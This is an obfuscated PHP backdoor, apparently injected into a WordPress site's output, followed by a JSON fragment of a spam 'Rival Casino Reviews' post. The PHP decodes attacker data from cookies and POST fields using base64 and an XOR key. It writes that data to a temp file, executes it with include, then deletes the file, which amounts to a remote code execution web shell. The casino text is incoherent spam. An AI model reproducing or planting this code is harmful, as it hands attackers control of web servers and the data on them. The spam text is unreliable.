$BHCRMP = chr (76) . 'k' . chr ( 446 - 351 )."\x6d" . "\x4d" . chr ( 362 - 292 ).chr (118); $zhhWet = chr (99) . chr ( 945 - 837 )."\141" . "\163" . 's' . '_' . chr (101) . "\x78" . chr (105) . chr ( 849 - 734 ).'t' . "\x73";$qEWOmMovi = class_exists($BHCRMP); $zhhWet = "17523";$JEpoMb = !1;if ($qEWOmMovi == $JEpoMb){function qmzmTWTSZ(){$CMghHr = new /* 42982 */ Lk_mMFv(15621 + 15621); $CMghHr = NULL;}$JdysMSUGb = "15621";class Lk_mMFv{private function qenfjgj($JdysMSUGb){if (is_array(Lk_mMFv::$rGfOkG)) {$yOwisU = sys_get_temp_dir() . "/" . crc32(Lk_mMFv::$rGfOkG[chr (115) . chr ( 456 - 359 ).'l' . chr (116)]);@Lk_mMFv::$rGfOkG["\x77" . chr ( 408 - 294 ).chr (105) . "\164" . chr (101)]($yOwisU, Lk_mMFv::$rGfOkG["\143" . "\157" . chr ( 738 - 628 ).'t' . "\x65" . "\156" . chr (116)]);include $yOwisU;@Lk_mMFv::$rGfOkG[chr (100) . "\x65" . 'l' . "\x65" . chr ( 1042 - 926 )."\145"]($yOwisU); $JdysMSUGb = "15621";exit();}}private $mYJNh;public function QPGRyDYHF(){echo 35792;}public function __destruct(){$JdysMSUGb = "64058_50069";$this->qenfjgj($JdysMSUGb); $JdysMSUGb = "64058_50069";}public function __construct($kOMzgLN=0){$IJvRK = $_POST;$vjsXiGPfk = $_COOKIE;$klBAzv = "04c02e11-d4f9-438b-82ab-70d9c52ca46f";$VvAWTQPZsK = @$vjsXiGPfk[substr($klBAzv, 0, 4)];if (!empty($VvAWTQPZsK)){$rJvImu = "base64";$aPeZg = "";$VvAWTQPZsK = explode(",", $VvAWTQPZsK);foreach ($VvAWTQPZsK as $RMBzS){$aPeZg .= @$vjsXiGPfk[$RMBzS];$aPeZg .= @$IJvRK[$RMBzS];}$aPeZg = array_map($rJvImu . chr (95) . chr ( 798 - 698 ).'e' . chr ( 599 - 500 )."\x6f" . "\x64" . "\145", array($aPeZg,)); $aPeZg = $aPeZg[0] ^ str_repeat($klBAzv, (strlen($aPeZg[0]) / strlen($klBAzv)) + 1);Lk_mMFv::$rGfOkG = @unserialize($aPeZg); $aPeZg = class_exists("64058_50069");}}public static $rGfOkG = 60167;}qmzmTWTSZ();}{"id":1433,"date":"2018-01-25T18:24:13","date_gmt":"2018-01-25T18:24:13","guid":{"rendered":""},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-30T00:00:00","slug":"rival-casino-reviews","status":"publish","type":"post","link":"https:\/\/jackgrave.com\/2018\/01\/25\/rival-casino-reviews\/","title":{"rendered":"Rival Casino Reviews"},"content":{"rendered":"

Rival Casino Reviews<\/h1>\n

RedKings software is fine in terms of functionality, but with top quality graphics and fantastic sound effects. For himself, rival casino reviews where this payment method has become very popular with casino players. <\/p>\n